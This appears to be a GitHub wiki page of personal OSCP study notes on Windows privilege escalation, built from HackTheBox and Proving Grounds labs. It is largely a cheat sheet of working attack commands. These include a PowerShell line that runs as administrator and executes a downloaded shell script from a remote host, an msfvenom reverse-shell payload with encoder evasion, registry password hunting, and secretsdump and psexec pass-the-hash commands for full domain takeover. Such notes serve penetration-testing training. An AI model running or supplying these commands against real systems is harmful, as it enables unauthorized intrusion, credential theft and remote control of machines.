Windows Privilege Escalation - A1vinSmith/OSCP-PWK GitHub Wiki
Fix PATH variable
set PATH=%SystemRoot%\system32;%SystemRoot%;
Quick win maybe responder too
whoami /priv
tasklist /svc
responder when you can trigger/poison a service that lets other users take action on that. e.g. SMB attack
Find creds or scripts
C:\Users>dir /S /B *.ps1
The /S switch lists files recursively (including sub-directories).
The /B switch displays only the file names without additional information.
Get-ChildItem -Recurse -Filter nc.exe
Constrained Language mode
Scheduled Tasks
By pass restricted set of privileges
Fodhelper
- PEN-300 Advanced Antivirus Evasion
Privilege Escalation Abusing Tokens that HTB Academy missed
SeBackupPrivilege
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens#sebackupprivilege-3.1.4
- https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960
- https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/
- https://juggernaut-sec.com/sebackupprivilege/
SeRestorePrivilege
- https://juggernaut-sec.com/proving-grounds-heist/
- https://github.com/A1vinSmith/OSCP-PWK/tree/master/PgPractice/Windows/Heist
SeManageVolumePrivilege
https://github.com/A1vinSmith/OSCP-PWK/tree/master/PgPractice/Windows/Access#escalation
AD Recycle Bin Group
Manually credentials hunting
reg query HKLM /f pass /t REG_SZ /s
https://github.com/A1vinSmith/OSCP-PWK/tree/master/PgPractice/Windows/Meathead
Su administrator with password
It's bizarre. su - root pw:Welcome1! in linux. But have to do another shell for windows
$passwd = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('administrator',$passwd)
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.16.9/shell2.ps1')" -Credential $creds
- Alternative option A: use this PS script. https://github.com/A1vinSmith/RunasCs/blob/master/Invoke-RunasCs.ps1
- Alternative option B:
Invoke-Commandinstead ofStart-Process. https://github.com/A1vinSmith/OSCP-PWK/tree/master/HackTheBox/Windows/Active%20Directory/Resolute#clean-up-by-del-the-share
Look into Program Files for interesting
- Program Files
- Program Files (x86)
- C:\ <- root level
icacls on interestings
icacls job.bat
https://app.hackthebox.com/machines/Markup/walkthroughs
TY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
Looking at the permissions of job.bat using icacls reveals that the group BUILTIN\Users has full control (F) over the file. The BUILTIN\Users group represents all local users, which includes Daniel as well. We might be able to get a shell by transferring netcat to the system and modifying the script to execute a reverse shell.
Chmod +r roo.txt
icacls root.txt /grant alfred:F
mimikatz
Weaponizing for privileged file writes
When having at least write permissions on windows folder
- https://github.com/A1vinSmith/OSCP-PWK/tree/master/PgPractice/Windows/Craft2#upload-ncexe
- https://github.com/A1vinSmith/OSCP-PWK/tree/master/PgPractice/Windows/Access#i-dont-know-why-but-it-seems-we-got-the-full-permissions-of-the-windows-folder
Counterpart on Linux
https://steflan-security.com/linux-privilege-escalation-writable-passwd-file/
Links and cheatsheets
- https://mysecurityjournal.blogspot.com/p/client-side-attacks.html
- https://www.fuzzysecurity.com/tutorials/16.html
- https://infosecwriteups.com/privilege-escalation-in-windows-380bee3a2842
- https://payatu.com/blog/suraj/Windows-Privilege-Escalation-Guide
- https://book.hacktricks.xyz/windows/windows-local-privilege-escalation
USOSVC
https://0xdf.gitlab.io/2020/02/01/htb-re.html#path-1-abuse-usosvc
Domain Controller backup account credentials(Impacket)
This account has unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes. Impacket "secretsdump.py". This will allow us to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer. Exploiting this, we will effectively have full control over the AD Domain.
sudo python3 secretsdump.py spookysec.local/[email protected] # spookysec.local is the domain here
sudo python3 secretsdump.py [email protected] # It also can be omitted
Login with full control of the AD Domain(Impacket)
python3 psexec.py [email protected] -hashes LMHASH:NTHASH
Login with credentials
python3 psexec.py Domain/user:[email protected]
or
python3 psexec.py Domain/user:pass@IP
Alternative tool evil-winrm https://github.com/Hackplayers/evil-winrm
With Metasploit
- https://blog.razrsec.uk/steel-mountain-walkthrough/
- https://medium.com/@ratiros01/tryhackme-steel-mountain-2ab2353cb302
upload shell_path/shell_name
load powershell
powershell_shell
. .\PowerUp.ps1
Invoke-AllChecks
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.22.145 LPORT=4443 -e x86/shikata_ga_nai -f exe -o ASCService.exe
Without Metasploit
Using SimpleHTTPServer, netcat and the payload to get the shell. Use powershell and winPEAS to escalation.
powershell -c "Invoke-WebRequest -Uri http://10.4.3.98:8910/winPEAS.exe" -OutFile winPEAS.exe
powershell -c "Invoke-WebRequest -OutFile winPEAS.exe http://10.4.3.98:8910/winPEAS.exe"
powershell -c wget "http://10.4.3.98/winPEAS.exe" -outfile "winPEAS.exe"
Others
Mimikatz
Look up registry values
Reg Query "HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat" /s
Hacking with Powershell
Automated Script
https://www.hackingarticles.in/window-privilege-escalation-automated-script/
- WinPEAS
- Seatbelt
- SharpUp
- JAWS – Just Another Windows (Enum) Script
- PowerUp
- Powerless
Metasploit:
- Windows-Exploit-Suggester
- Sherlock
- WinPEAS/SharpUp/Seatbelt
PowerShell Empire:
- WinPEAS
- PowerUp
- Sherlock
- Watson
- Privesccheck